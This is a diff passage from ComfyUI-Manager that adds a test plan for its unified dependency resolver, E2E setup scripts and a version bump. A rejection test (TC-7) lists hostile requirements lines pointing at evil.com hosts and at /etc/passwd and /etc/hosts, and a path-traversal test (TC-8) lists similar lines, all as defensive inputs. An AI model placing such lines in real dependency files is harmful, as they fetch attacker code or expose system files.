+- Exit code: 0
+- Both packs installed: `[INSTALLED] comfyui-impact-subpack`, `[INSTALLED] comfyui-inspire-pack`
+- Batch resolution runs once (not twice) after all installs complete
+- Resolves deps for **all** installed packs (impact + subpack + inspire + manager)
+- New dependencies importable: `cachetools`, `webcolors`, `piexif`
+- Previously installed deps (from step 1) remain intact
+
+---
+
+## Test Fixture Setup
+
+Each TC that requires node packs should use isolated, deterministic fixtures:
+
+```bash
+# Create test node pack
+mkdir -p "$COMFY_ROOT/custom_nodes/test_pack_a"
+echo "chardet>=5.0" > "$COMFY_ROOT/custom_nodes/test_pack_a/requirements.txt"
+
+# Cleanup after test
+rm -rf "$COMFY_ROOT/custom_nodes/test_pack_a"
+```
+
+Ensure no other node packs in `custom_nodes/` interfere with expected counts. Use a clean `custom_nodes/` directory or account for existing packs in assertions.
+
+---
+
+## TC-1: Normal Batch Resolution [P0]
+
+**Precondition**: `use_unified_resolver = true`, uv installed, at least one node pack with `requirements.txt`
+
+**Steps**:
+1. Create `$COMFY_ROOT/custom_nodes/test_pack_a/requirements.txt` with content: `chardet>=5.0`
+2. Start ComfyUI
+
+**Expected log**:
+```
+[UnifiedDepResolver] Collected N deps from M sources (skipped 0)
+[UnifiedDepResolver] running: ... uv pip compile ...
+[UnifiedDepResolver] running: ... uv pip install ...
+[UnifiedDepResolver] startup batch resolution succeeded
+```
+
+**Verify**: Neither `Install: pip packages for` nor `Install: pip packages` appears in output (both per-node pip variants must be absent)
+
+---
+
+## TC-2: Disabled State (Default) [P1]
+
+**Precondition**: `use_unified_resolver = false` or key absent from config.ini
+
+**Steps**: Start ComfyUI
+
+**Verify**: No `[UnifiedDepResolver]` log output at all
+
+---
+
+## TC-3: Fallback When uv Unavailable [P0]
+
+**Precondition**: `use_unified_resolver = true`, uv completely unavailable
+
+**Steps**:
+1. Create a venv **without** uv installed (`uv` package not in venv)
+2. Ensure no standalone `uv` binary exists in `$PATH` (rename or use isolated `$PATH`)
+3. Start ComfyUI
+
+```bash
+# Reliable uv removal: both module and binary must be absent
+uv pip uninstall uv
+# Verify neither path works
+python -m uv --version 2>&1 | grep -q "No module" && echo "module uv: absent"
+command -v uv >/dev/null 2>&1 || echo "binary uv: absent"
+```
+
+**Expected log**:
+```
+[UnifiedDepResolver] uv not available at startup, falling back to per-node pip
+```
+
+**Verify**:
+- `manager_util.use_unified_resolver` is reset to `False`
+- Subsequent node pack installations use per-node pip install normally
+
+---
+
+## TC-4: Fallback on Compile Failure [P0]
+
+**Precondition**: `use_unified_resolver = true`, conflicting dependencies
+
+**Steps**:
+1. Node pack A `requirements.txt`: `numpy==1.24.0`
+2. Node pack B `requirements.txt`: `numpy==1.26.0`
+3. Start ComfyUI
+
+**Expected log**:
+```
+[UnifiedDepResolver] startup batch failed: compile failed: ..., falling back to per-node pip
+```
+
+**Verify**:
+- `manager_util.use_unified_resolver` is reset to `False`
+- Falls back to per-node pip install normally
+
+---
+
+## TC-5: Fallback on Install Failure [P0]
+
+**Precondition**: `use_unified_resolver = true`, compile succeeds but install fails
+
+**Steps**:
+1. Create node pack with `requirements.txt`: `numpy<2`
+2. Force install failure by making the venv's `site-packages` read-only:
+```bash
+chmod -R a-w "$(python -c 'import site; print(site.getsitepackages()[0])')"
+```
+3. Start ComfyUI
+4. After test, restore permissions:
+```bash
+chmod -R u+w "$(python -c 'import site; print(site.getsitepackages()[0])')"
+```
+
+**Expected log**:
+```
+[UnifiedDepResolver] startup batch failed: ..., falling back to per-node pip
+```
+> The `...` contains raw stderr from `uv pip install` (e.g., permission denied errors).
+
+**Verify**:
+- `manager_util.use_unified_resolver` is reset to `False`
+- Falls back to per-node pip install
+
+---
+
+## TC-6: install.py Execution Preserved [P0]
+
+**Precondition**: `use_unified_resolver = true`, ComfyUI running with batch resolution succeeded
+
+**Steps**:
+1. While ComfyUI is running, install a node pack that has both `install.py` and `requirements.txt` via API:
+```bash
+curl -X POST http://localhost:8199/v2/manager/queue/task \
+ -H "Content-Type: application/json" \
+ -d '{
+ "ui_id": "test-installpy",
+ "client_id": "test-client",
+ "kind": "install",
+ "params": {
+        "id": "<node_pack_id>",
+ "version": "latest",
+ "selected_version": "latest",
+ "mode": "remote",
+ "channel": "default"
+ }
+ }'
+```
+> Choose a CNR node pack known to have both `install.py` and `requirements.txt`.
+> Alternatively, use the Manager UI to install the same pack.
+
+2. Check logs after installation
+
+**Verify**:
+- `Install: install script` is printed (install.py runs immediately during install)
+- `Install: pip packages` does NOT appear (deps deferred, not installed per-node)
+- Log: `[UnifiedDepResolver] deps deferred to startup batch resolution for <pack_name>`
+- After **restart**, the new pack's deps are included in batch resolution (`Collected N deps from M sources`)
+
+---
+
+## TC-7: Dangerous Pattern Rejection [P0]
+
+**Precondition**: `use_unified_resolver = true`
+
+**Steps**: Include any of the following in a node pack's `requirements.txt`:
+```
+-r ../../../etc/hosts
+--requirement secret.txt
+-e git+https://evil.com/repo
+--editable ./local
+-c constraint.txt
+--constraint external.txt
+--find-links http://evil.com/pkgs
+-f http://evil.com/pkgs
+evil_pkg @ file:///etc/passwd
+```
+
+**Expected log**:
+```
+[UnifiedDepResolver] rejected dangerous line: '...' from <pack_name>
+```
+
+**Verify**: Dangerous lines are skipped; remaining valid deps are installed normally
+
+---
+
+## TC-8: Path Separator Rejection [P0]
+
+**Precondition**: `use_unified_resolver = true`
+
+**Steps**: Node pack `requirements.txt`:
+```
+../evil/pkg
+bad\pkg
+./local_package
+```
+
+**Expected log**:
+```
+[UnifiedDepResolver] rejected path separator: '...' from <pack_name>
+```
+
+**Verify**: Lines with `/` or `\` in the package name portion are rejected; valid deps on other lines are processed normally
+
+---
+
+## TC-9: --index-url / --extra-index-url Separation [P0]
+
+**Precondition**: `use_unified_resolver = true`
+
+Test all four inline forms:
+
+| # | `requirements.txt` content | Expected package | Expected URL |
+|---|---------------------------|-----------------|--------------|
+| a | `torch --index-url https://example.com/whl` | `torch` | `https://example.com/whl` |
+| b | `torch --extra-index-url https://example.com/whl` | `torch` | `https://example.com/whl` |
+| c | `--index-url https://example.com/whl` (standalone) | *(none)* | `https://example.com/whl` |
+| d | `--extra-index-url https://example.com/whl` (standalone) | *(none)* | `https://example.com/whl` |
+
+**Steps**: Create a node pack with each variant (one at a time or combined with a valid package on a separate line)
+
+**Verify**:
+- Package spec is correctly extracted (or empty for standalone lines)
+- URL is passed as `--extra-index-url` to `uv pip compile`
+- Duplicate URLs across multiple node packs are deduplicated
+- Log: `[UnifiedDepResolver] extra-index-url: <url>`
+
+---
+
+## TC-10: Credential Redaction [P0]
+
+**Precondition**: `use_unified_resolver = true`
+
+**Steps**: Node pack `requirements.txt`:
+```
+private-pkg --index-url https://user:token123@pypi.private.com/simple
+```
+
+**Verify**:
+- `user:token123` does NOT appear in logs
+- Masked as `****@` in log output
+
+---
+
+## TC-11: Disabled Node Packs Excluded [P1]
+
+**Precondition**: `use_unified_resolver = true`
+
+**Steps**: Test both disabled styles:
+1. New style: `custom_nodes/.disabled/test_pack/requirements.txt` with content: `numpy`
+2. Old style: `custom_nodes/test_pack.disabled/requirements.txt` with content: `requests`
+3. Start ComfyUI
+
+**Verify**: Neither disabled node pack's deps are collected (not included in `Collected N`)
+
+---
+
+## TC-12: No Dependencies [P2]
+
+**Precondition**: `use_unified_resolver = true`, only node packs without `requirements.txt`
+
+**Steps**: Start ComfyUI
+
+**Expected log**:
+```
+[UnifiedDepResolver] No dependencies to resolve
+```
+
+**Verify**: Compile/install steps are skipped; startup completes normally
+
+---
+
+## TC-13: Runtime Node Pack Install (Defer Behavior) [P1]
+
+**Precondition**: `use_unified_resolver = true`, batch resolution succeeded at startup
+
+**Steps**:
+1. Start ComfyUI and confirm batch resolution succeeds
+2. While ComfyUI is running, install a new node pack via API:
+```bash
+curl -X POST http://localhost:8199/v2/manager/queue/task \
+ -H "Content-Type: application/json" \
+ -d '{
+ "ui_id": "test-defer-1",
+ "client_id": "test-client",
+ "kind": "install",
+ "params": {
+        "id": "<node_pack_id>",
+ "version": "latest",
+ "selected_version": "latest",
+ "mode": "remote",
+ "channel": "default"
+ }
+ }'
+```
+> Replace `<node_pack_id>` with a real CNR node pack ID (e.g., from the Manager UI).
+> Alternatively, use the Manager UI to install a node pack.
+
+3. Check logs after installation
+
+**Verify**:
+- Log: `[UnifiedDepResolver] deps deferred to startup batch resolution for <pack_name>`
+- `Install: pip packages` does NOT appear
+- After ComfyUI **restart**, the new node pack's deps are included in batch resolution
+
+---
+
+## TC-14: Both Unified Resolver Code Paths [P0]
+
+Verify both code locations that guard per-node pip install behave correctly in unified mode:
+
+| Path | Guard Variable | Trigger | Location |
+|------|---------------|---------|----------|
+| Runtime install | `manager_util.use_unified_resolver` | API install while ComfyUI is running | `glob/manager_core.py` class method (~line 846) |
+| Startup lazy install | `_unified_resolver_succeeded` | Queued install processed at restart | `prestartup_script.py` `execute_lazy_install_script()` (~line 594) |
+
+> **Note**: The standalone `execute_install_script()` in `glob/manager_core.py` (~line 1881) also has a unified resolver guard but is reachable via `update-comfyui`, git-based node pack updates, gitclone operations, CLI, and legacy server paths. The guard is identical to the class method; see [Out of Scope](#out-of-scope-deferred).
+
+**Steps**:
+
+**Path 1 — Runtime API install (class method)**:
+```bash
+# While ComfyUI is running:
+curl -X POST http://localhost:8199/v2/manager/queue/task \
+ -H "Content-Type: application/json" \
+ -d '{
+ "ui_id": "test-path1",
+ "client_id": "test-client",
+ "kind": "install",
+ "params": {
+        "id": "<node_pack_id>",
+ "version": "latest",
+ "selected_version": "latest",
+ "mode": "remote",
+ "channel": "default"
+ }
+ }'
+```
+
+> Choose a CNR node pack that has both `install.py` and `requirements.txt`.
+
+**Path 2 — Startup lazy install (`execute_lazy_install_script`)**:
+1. Create a test node pack with both `install.py` and `requirements.txt`:
+```bash
+mkdir -p "$COMFY_ROOT/custom_nodes/test_pack_lazy"
+echo 'print("lazy install.py executed")' > "$COMFY_ROOT/custom_nodes/test_pack_lazy/install.py"
+echo "chardet" > "$COMFY_ROOT/custom_nodes/test_pack_lazy/requirements.txt"
+```
+2. Manually inject a `#LAZY-INSTALL-SCRIPT` entry into `install-scripts.txt`:
+```bash
+SCRIPTS_DIR="$COMFY_ROOT/user/__manager/startup-scripts"
+mkdir -p "$SCRIPTS_DIR"
+PYTHON_PATH=$(which python)
+echo "['$COMFY_ROOT/custom_nodes/test_pack_lazy', '#LAZY-INSTALL-SCRIPT', '$PYTHON_PATH']" \
+ >> "$SCRIPTS_DIR/install-scripts.txt"
+```
+3. Start ComfyUI (with `use_unified_resolver = true`)
+
+**Verify**:
+- Path 1: `[UnifiedDepResolver] deps deferred to startup batch resolution for <pack_name>` appears, `install.py` runs immediately, `Install: pip packages` does NOT appear
+- Path 2: `lazy install.py executed` is printed (install.py runs at startup), `Install: pip packages for` does NOT appear for the pack (skipped because `_unified_resolver_succeeded` is True after batch resolution)
+
+---
+
+## TC-15: Behavior After Fallback in Same Process [P1]
+
+**Precondition**: Resolver failed at startup (TC-4 or TC-5 scenario)
+
+**Steps**:
+1. Set up conflicting deps (as in TC-4) and start ComfyUI (resolver fails, flag reset to `False`)
+2. While still running, install a new node pack via API:
+```bash
+curl -X POST http://localhost:8199/v2/manager/queue/task \
+ -H "Content-Type: application/json" \
+ -d '{
+ "ui_id": "test-postfallback",
+ "client_id": "test-client",
+ "kind": "install",
+ "params": {
+        "id": "<node_pack_id>",
+ "version": "latest",
+ "selected_version": "latest",
+ "mode": "remote",
+ "channel": "default"
+ }
+ }'
+```
+
+**Verify**:
+- New node pack uses per-node pip install (not deferred)
+- `Install: pip packages` appears normally
+- On next restart with conflicts resolved, unified resolver retries if config still `true`
+
+---
+
+## TC-16: Generic Exception Fallback [P1]
+
+**Precondition**: `use_unified_resolver = true`, an exception escapes before `resolve_and_install()`
+
+This covers the `except Exception` handler at `prestartup_script.py` (~line 793), distinct from `UvNotAvailableError` (TC-3) and `ResolveResult` failure (TC-4/TC-5). The generic handler catches errors in the import, `collect_node_pack_paths()`, `collect_base_requirements()`, or `UnifiedDepResolver.__init__()` — all of which run before the resolver's own internal error handling.
+
+**Steps**:
+1. Make the `custom_nodes` directory unreadable so `collect_node_pack_paths()` raises a `PermissionError`:
+```bash
+chmod a-r "$COMFY_ROOT/custom_nodes"
+```
+2. Start ComfyUI
+3. After test, restore permissions:
+```bash
+chmod u+r "$COMFY_ROOT/custom_nodes"
+```
+
+**Expected log**:
+```
+[UnifiedDepResolver] startup error: ..., falling back to per-node pip
+```
+
+**Verify**:
+- `manager_util.use_unified_resolver` is reset to `False`
+- Falls back to per-node pip install normally
+- Log pattern is `startup error:` (NOT `startup batch failed:` nor `uv not available`)
+
+---
+
+## TC-17: Restart Dependency Detection [P0]
+
+**Precondition**: `use_unified_resolver = true`, automated E2E scripts available
+
+This test verifies that the resolver correctly detects and installs dependencies for node packs added between restarts, incrementally building the dependency set.
+
+**Steps**:
+1. Boot ComfyUI with no custom node packs (Boot 1 — baseline)
+2. Verify baseline deps only (Manager's own deps)
+3. Stop ComfyUI
+4. Clone `ComfyUI-Impact-Pack` into `custom_nodes/`
+5. Restart ComfyUI (Boot 2)
+6. Verify Impact Pack deps are installed (`cv2`, `skimage`, `dill`, `scipy`, `matplotlib`)
+7. Stop ComfyUI
+8. Clone `ComfyUI-Inspire-Pack` into `custom_nodes/`
+9. Restart ComfyUI (Boot 3)
+10. Verify Inspire Pack deps are installed (`cachetools`, `webcolors`)
+
+**Expected log (each boot)**:
+```
+[UnifiedDepResolver] Collected N deps from M sources (skipped S)
+[UnifiedDepResolver] running: ... uv pip compile ...
+[UnifiedDepResolver] running: ... uv pip install ...
+[UnifiedDepResolver] startup batch resolution succeeded
+```
+
+**Verify**:
+- Boot 1: ~10 deps from ~10 sources; `cv2`, `dill`, `cachetools` are NOT installed
+- Boot 2: ~19 deps from ~18 sources; `cv2`, `skimage`, `dill`, `scipy`, `matplotlib` all importable
+- Boot 3: ~24 deps from ~21 sources; `cachetools`, `webcolors` also importable
+- Both packs show as loaded in logs
+
+**Automation**: Use `tests/e2e/scripts/` (setup → start → stop) with node pack cloning between boots.
+
+---
+
+## TC-18: Real Node Pack Integration [P0]
+
+**Precondition**: `use_unified_resolver = true`, network access to GitHub + PyPI
+
+Full pipeline test with real-world node packs (`ComfyUI-Impact-Pack` + `ComfyUI-Inspire-Pack`) to verify the resolver handles production requirements.txt files correctly.
+
+**Steps**:
+1. Set up E2E environment
+2. Clone both Impact Pack and Inspire Pack into `custom_nodes/`
+3. Direct-mode: instantiate `UnifiedDepResolver`, call `collect_requirements()` and `resolve_and_install()`
+4. Boot-mode: start ComfyUI and verify via logs
+
+**Expected behavior (direct mode)**:
+```
+--- Discovered node packs (3) --- # Manager, Impact, Inspire
+ ComfyUI-Impact-Pack
+ ComfyUI-Inspire-Pack
+ ComfyUI-Manager
+
+--- Phase 1: Collect Requirements ---
+ Total requirements: ~24
+ Skipped: 1 # SAM2 git+https:// URL
+ Extra index URLs: set()
+```
+
+**Verify**:
+- `git+https://github.com/facebookresearch/sam2.git` is correctly rejected with "rejected path separator"
+- All other dependencies are collected and resolved
+- After install, `cv2`, `PIL`, `scipy`, `skimage`, `matplotlib` are all importable
+- No conflicting version errors during compile
+
+**Automation**: Use `tests/e2e/scripts/` (setup → clone packs → start) with direct-mode resolver invocation.
+
+---
+
+## Validated Behaviors (from E2E Testing)
+
+The following behaviors were confirmed during manual E2E testing:
+
+### Resolver Pipeline
+- **3-phase pipeline**: Collect → `uv pip compile` → `uv pip install` works end-to-end
+- **Incremental detection**: Resolver discovers new node packs on each restart without reinstalling existing deps
+- **Dependency deduplication**: Overlapping deps from multiple packs are resolved to compatible versions
+
+### Security & Filtering
+- **`git+https://` rejection**: URLs like `git+https://github.com/facebookresearch/sam2.git` are rejected with "rejected path separator" — SAM2 is the only dependency skipped from Impact Pack
+- **Blacklist filtering**: `PackageRequirement` objects have `.name`, `.spec`, `.source` attributes; `collected.skipped` returns `[(spec_string, reason_string)]` tuples
+
+### Manager Integration
+- **Manager v4 endpoints**: All endpoints use `/v2/` prefix (e.g., `/v2/manager/queue/status`)
+- **`Blocked by policy`**: Expected when Manager is pip-installed and also symlinked in `custom_nodes/`; prevents legacy double-loading
+- **config.ini path**: Must be at `$COMFY_ROOT/user/__manager/config.ini`, not in the symlinked Manager dir
+
+### Environment
+- **PYTHONPATH requirement**: `comfy` is a local package (not pip-installed); `comfyui_manager` imports from `comfy`, so both require `PYTHONPATH=$COMFY_ROOT`
+- **HOME isolation**: `HOME=$E2E_ROOT/home` prevents host config contamination during boot
+
+---
+
+## Summary
+
+| TC | P | Scenario | Key Verification |
+|----|---|----------|------------------|
+| 1 | P0 | Normal batch resolution | compile → install pipeline |
+| 2 | P1 | Disabled state | No impact on existing behavior |
+| 3 | P0 | uv unavailable fallback | Flag reset + per-node resume |
+| 4 | P0 | Compile failure fallback | Flag reset + per-node resume |
+| 5 | P0 | Install failure fallback | Flag reset + per-node resume |
+| 6 | P0 | install.py preserved | deps defer, install.py immediate |
+| 7 | P0 | Dangerous pattern rejection | Security filtering |
+| 8 | P0 | Path separator rejection | `/` and `\` in package names |
+| 9 | P0 | index-url separation | All 4 variants + dedup |
+| 10 | P0 | Credential redaction | Log security |
+| 11 | P1 | Disabled packs excluded | Both `.disabled/` and `.disabled` suffix |
+| 12 | P2 | No dependencies | Empty pipeline |
+| 13 | P1 | Runtime install defer | Defer until restart |
+| 14 | P0 | Both unified resolver paths | runtime API (class method) + startup lazy install |
+| 15 | P1 | Post-fallback behavior | Per-node pip resumes in same process |
+| 16 | P1 | Generic exception fallback | Distinct from uv-absent and batch-failed |
+| 17 | P0 | Restart dependency detection | Incremental node pack discovery across restarts |
+| 18 | P0 | Real node pack integration | Impact + Inspire Pack full pipeline |
+| CLI-1 | P0 | CLI normal batch resolution | exit 0, deps installed |
+| CLI-2 | P1 | CLI no custom nodes | exit 0, graceful empty |
+| CLI-3 | P0 | CLI uv unavailable | exit 1, error message |
+| CLI-4 | P0 | CLI conflicting deps | exit 1, resolution failed |
+| CLI-5 | P0 | CLI dangerous pattern skip | exit 0, dangerous skipped |
+| CLI-6 | P0 | install --uv-compile single | per-node pip skipped, batch resolve |
+| CLI-7 | P0 | install --uv-compile multi | batch once after all installs |
+
+### Traceability
+
+| Feature Requirement | Test Cases |
+|---------------------|------------|
+| FR-1: Dependency collection | TC-1, TC-11, TC-12 |
+| FR-2: Input sanitization | TC-7, TC-8, TC-10 |
+| FR-3: Index URL handling | TC-9 |
+| FR-4: Batch resolution (compile) | TC-1, TC-4 |
+| FR-5: Batch install | TC-1, TC-5 |
+| FR-6: install.py preserved | TC-6, TC-14 |
+| FR-7: Startup batch integration | TC-1, TC-2, TC-3 |
+| Fallback behavior | TC-3, TC-4, TC-5, TC-15, TC-16 |
+| Disabled node pack exclusion | TC-11 |
+| Runtime defer behavior | TC-13, TC-14 |
+| FR-8: Restart discovery | TC-17 |
+| FR-9: Real-world compatibility | TC-17, TC-18 |
+| FR-2: Input sanitization (git URLs) | TC-8, TC-18 |
+| FR-10: CLI batch resolution | TC-CLI-1, TC-CLI-2, TC-CLI-3, TC-CLI-4, TC-CLI-5 |
+| FR-11: CLI install --uv-compile | TC-CLI-6, TC-CLI-7 |
diff --git a/pyproject.toml b/pyproject.toml
index 284e71c3..3564d0e7 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -5,7 +5,7 @@ build-backend = "setuptools.build_meta"
[project]
name = "comfyui-manager"
license = { text = "GPL-3.0-only" }
-version = "4.1b1"
+version = "4.1b2"
requires-python = ">= 3.9"
description = "ComfyUI-Manager provides features to install and manage custom nodes for ComfyUI, as well as various functionalities to assist with ComfyUI."
readme = "README.md"
diff --git a/tests/e2e/scripts/setup_e2e_env.sh b/tests/e2e/scripts/setup_e2e_env.sh
new file mode 100755
index 00000000..64faf637
--- /dev/null
+++ b/tests/e2e/scripts/setup_e2e_env.sh
@@ -0,0 +1,241 @@
+#!/usr/bin/env bash
+# setup_e2e_env.sh — Automated E2E environment setup for ComfyUI + Manager
+#
+# Creates an isolated ComfyUI installation with ComfyUI-Manager for E2E testing.
+# Idempotent: skips setup if marker file and key artifacts already exist.
+#
+# Input env vars:
+# E2E_ROOT — target directory (default: auto-generated via mktemp)
+# MANAGER_ROOT — manager repo root (default: auto-detected from script location)
+# COMFYUI_BRANCH — ComfyUI branch to clone (default: master)
+# PYTHON — Python executable (default: python3)
+#
+# Output (last line of stdout):
+# E2E_ROOT=/path/to/environment
+#
+# Exit: 0=success, 1=failure
+
+set -euo pipefail
+
+# --- Constants ---
+COMFYUI_REPO="https://github.com/comfyanonymous/ComfyUI.git"
+PYTORCH_CPU_INDEX="https://download.pytorch.org/whl/cpu"
+CONFIG_INI_CONTENT="[default]
+use_uv = true
+use_unified_resolver = true
+file_logging = false"
+
+# --- Logging helpers ---
+log() { echo "[setup_e2e] $*"; }
+err() { echo "[setup_e2e] ERROR: $*" >&2; }
+die() { err "$@"; exit 1; }
+
+# --- Detect manager root by walking up from script dir to find pyproject.toml ---
+detect_manager_root() {
+ local dir
+ dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+ while [[ "$dir" != "/" ]]; do
+ if [[ -f "$dir/pyproject.toml" ]]; then
+ echo "$dir"
+ return 0
+ fi
+ dir="$(dirname "$dir")"
+ done
+ return 1
+}
+
+# --- Validate prerequisites ---
+validate_prerequisites() {
+ local py="${PYTHON:-python3}"
+ local missing=()
+
+ command -v git >/dev/null 2>&1 || missing+=("git")
+ command -v uv >/dev/null 2>&1 || missing+=("uv")
+ command -v "$py" >/dev/null 2>&1 || missing+=("$py")
+
+ if [[ ${#missing[@]} -gt 0 ]]; then
+ die "Missing prerequisites: ${missing[*]}"
+ fi
+
+ # Verify Python version >= 3.9
+ local py_version
+ py_version=$("$py" -c "import sys; print(f'{sys.version_info.major}.{sys.version_info.minor}')")
+ local major minor
+ major="${py_version%%.*}"
+ minor="${py_version##*.}"
+ if [[ "$major" -lt 3 ]] || { [[ "$major" -eq 3 ]] && [[ "$minor" -lt 9 ]]; }; then
+ die "Python 3.9+ required, found $py_version"
+ fi
+ log "Prerequisites OK (python=$py_version, git=$(git --version | awk '{print $3}'), uv=$(uv --version 2>&1 | awk '{print $2}'))"
+}
+
+# --- Check idempotency: skip if already set up ---
+check_already_setup() {
+ local root="$1"
+ if [[ -f "$root/.e2e_setup_complete" ]] \
+ && [[ -d "$root/comfyui" ]] \
+ && [[ -d "$root/venv" ]] \
+ && [[ -f "$root/comfyui/user/__manager/config.ini" ]] \
+ && [[ -L "$root/comfyui/custom_nodes/ComfyUI-Manager" ]]; then
+ log "Environment already set up at $root (marker file exists). Skipping."
+ echo "E2E_ROOT=$root"
+ exit 0
+ fi
+}
+
+# --- Verify the setup ---
+verify_setup() {
+  local root="$1"
+  local manager_root="$2"
+  local venv_py="$root/venv/bin/python"
+  local errors=0
+
+  log "Running verification checks..."
+
+  # Check ComfyUI directory
+  if [[ ! -f "$root/comfyui/main.py" ]]; then
+    err "Verification FAIL: comfyui/main.py not found"
+    errors=$((errors + 1))  # not '((errors++))': that returns status 1 when errors==0, aborting under 'set -e'
+  fi
+
+  # Check venv python
+  if [[ ! -x "$venv_py" ]]; then
+    err "Verification FAIL: venv python not executable"
+    errors=$((errors + 1))
+  fi
+
+  # Check symlink
+  local link_target="$root/comfyui/custom_nodes/ComfyUI-Manager"
+  if [[ ! -L "$link_target" ]]; then
+    err "Verification FAIL: symlink $link_target does not exist"
+    errors=$((errors + 1))
+  elif [[ "$(readlink -f "$link_target")" != "$(readlink -f "$manager_root")" ]]; then
+    err "Verification FAIL: symlink target mismatch"
+    errors=$((errors + 1))
+  fi
+
+  # Check config.ini
+  if [[ ! -f "$root/comfyui/user/__manager/config.ini" ]]; then
+    err "Verification FAIL: config.ini not found"
+    errors=$((errors + 1))
+  fi
+
+  # Check Python imports
+  # comfy is a local package inside ComfyUI (not pip-installed), and
+  # comfyui_manager.__init__ imports from comfy — both need PYTHONPATH
+  if ! PYTHONPATH="$root/comfyui" "$venv_py" -c "import comfy" 2>/dev/null; then
+    err "Verification FAIL: 'import comfy' failed"
+    errors=$((errors + 1))
+  fi
+
+  if ! PYTHONPATH="$root/comfyui" "$venv_py" -c "import comfyui_manager" 2>/dev/null; then
+    err "Verification FAIL: 'import comfyui_manager' failed"
+    errors=$((errors + 1))
+  fi
+
+  if [[ "$errors" -gt 0 ]]; then
+    die "Verification failed with $errors error(s)"
+  fi
+  log "Verification OK: all checks passed"
+}
+
+# ===== Main =====
+
+# Resolve MANAGER_ROOT
+if [[ -z "${MANAGER_ROOT:-}" ]]; then
+ MANAGER_ROOT="$(detect_manager_root)" || die "Cannot detect MANAGER_ROOT. Set it explicitly."
+fi
+MANAGER_ROOT="$(cd "$MANAGER_ROOT" && pwd)"
+log "MANAGER_ROOT=$MANAGER_ROOT"
+
+# Validate prerequisites
+validate_prerequisites
+
+PYTHON="${PYTHON:-python3}"
+COMFYUI_BRANCH="${COMFYUI_BRANCH:-master}"
+
+# Create or use E2E_ROOT
+CREATED_BY_US=false
+if [[ -z "${E2E_ROOT:-}" ]]; then
+ E2E_ROOT="$(mktemp -d -t e2e_comfyui_XXXXXX)"
+ CREATED_BY_US=true
+ log "Created E2E_ROOT=$E2E_ROOT"
+else
+ mkdir -p "$E2E_ROOT"
+ log "Using E2E_ROOT=$E2E_ROOT"
+fi
+
+# Idempotency check
+check_already_setup "$E2E_ROOT"
+
+# Cleanup trap: remove E2E_ROOT on failure only if we created it
+cleanup_on_failure() {
+ local exit_code=$?
+ if [[ "$exit_code" -ne 0 ]] && [[ "$CREATED_BY_US" == "true" ]]; then
+ err "Setup failed. Cleaning up $E2E_ROOT"
+ rm -rf "$E2E_ROOT"
+ fi
+}
+trap cleanup_on_failure EXIT
+
+# Step 1: Clone ComfyUI
+log "Step 1/8: Cloning ComfyUI (branch=$COMFYUI_BRANCH)..."
+if [[ -d "$E2E_ROOT/comfyui/.git" ]]; then
+ log " ComfyUI already cloned, skipping"
+else
+ git clone --depth=1 --branch "$COMFYUI_BRANCH" "$COMFYUI_REPO" "$E2E_ROOT/comfyui"
+fi
+
+# Step 2: Create virtual environment
+log "Step 2/8: Creating virtual environment..."
+if [[ -d "$E2E_ROOT/venv" ]]; then
+ log " venv already exists, skipping"
+else
+ uv venv "$E2E_ROOT/venv"
+fi
+VENV_PY="$E2E_ROOT/venv/bin/python"
+
+# Step 3: Install ComfyUI dependencies
+log "Step 3/8: Installing ComfyUI dependencies (CPU-only)..."
+uv pip install \
+ --python "$VENV_PY" \
+ -r "$E2E_ROOT/comfyui/requirements.txt" \
+ --extra-index-url "$PYTORCH_CPU_INDEX"
+
+# Step 4: Install ComfyUI-Manager (non-editable, production-like)
+log "Step 4/8: Installing ComfyUI-Manager..."
+uv pip install --python "$VENV_PY" "$MANAGER_ROOT"
+
+# Step 5: Create symlink for custom_nodes discovery
+log "Step 5/8: Creating custom_nodes symlink..."
+mkdir -p "$E2E_ROOT/comfyui/custom_nodes"
+local_link="$E2E_ROOT/comfyui/custom_nodes/ComfyUI-Manager"
+if [[ -L "$local_link" ]]; then
+ log " Symlink already exists, updating"
+ rm -f "$local_link"
+fi
+ln -s "$MANAGER_ROOT" "$local_link"
+
+# Step 6: Write config.ini to correct path
+log "Step 6/8: Writing config.ini..."
+mkdir -p "$E2E_ROOT/comfyui/user/__manager"
+echo "$CONFIG_INI_CONTENT" > "$E2E_ROOT/comfyui/user/__manager/config.ini"
+
+# Step 7: Create HOME isolation directories
+log "Step 7/8: Creating HOME isolation directories..."
+mkdir -p "$E2E_ROOT/home/.config"
+mkdir -p "$E2E_ROOT/home/.local/share"
+mkdir -p "$E2E_ROOT/logs"
+
+# Step 8: Verify setup
+log "Step 8/8: Verifying setup..."
+verify_setup "$E2E_ROOT" "$MANAGER_ROOT"
+
+# Write marker file
+date -Iseconds > "$E2E_ROOT/.e2e_setup_complete"
+
+# Clear the EXIT trap since setup succeeded
+trap - EXIT
+
+log "Setup complete."
+echo "E2E_ROOT=$E2E_ROOT"
diff --git a/tests/e2e/scripts/start_comfyui.sh b/tests/e2e/scripts/start_comfyui.sh
new file mode 100755
index 00000000..f97b8b79
--- /dev/null
+++ b/tests/e2e/scripts/start_comfyui.sh
@@ -0,0 +1,129 @@
+#!/usr/bin/env bash
+# start_comfyui.sh — Foreground-blocking ComfyUI launcher for E2E tests
+#
+# Starts ComfyUI in the background, then blocks the foreground until the server
+# is ready (or timeout). This makes it safe to call from subprocess.run() or
+# Claude's Bash tool — the call returns only when ComfyUI is accepting requests.
+#
+# Input env vars:
+# E2E_ROOT — (required) path to E2E environment from setup_e2e_env.sh
+# PORT — ComfyUI listen port (default: 8199)
+# TIMEOUT — max seconds to wait for readiness (default: 120)
+#
+# Output (last line on success):
+#   COMFYUI_PID=<pid> PORT=<port>
+#
+# Exit: 0=ready, 1=timeout/failure
+
+set -euo pipefail
+
+# --- Defaults ---
+PORT="${PORT:-8199}"
+TIMEOUT="${TIMEOUT:-120}"
+
+# --- Logging helpers ---
+log() { echo "[start_comfyui] $*"; }
+err() { echo "[start_comfyui] ERROR: $*" >&2; }
+die() { err "$@"; exit 1; }
+
+# --- Validate environment ---
+[[ -n "${E2E_ROOT:-}" ]] || die "E2E_ROOT is not set"
+[[ -d "$E2E_ROOT/comfyui" ]] || die "ComfyUI not found at $E2E_ROOT/comfyui"
+[[ -x "$E2E_ROOT/venv/bin/python" ]] || die "venv python not found at $E2E_ROOT/venv/bin/python"
+[[ -f "$E2E_ROOT/.e2e_setup_complete" ]] || die "Setup marker not found. Run setup_e2e_env.sh first."
+
+PY="$E2E_ROOT/venv/bin/python"
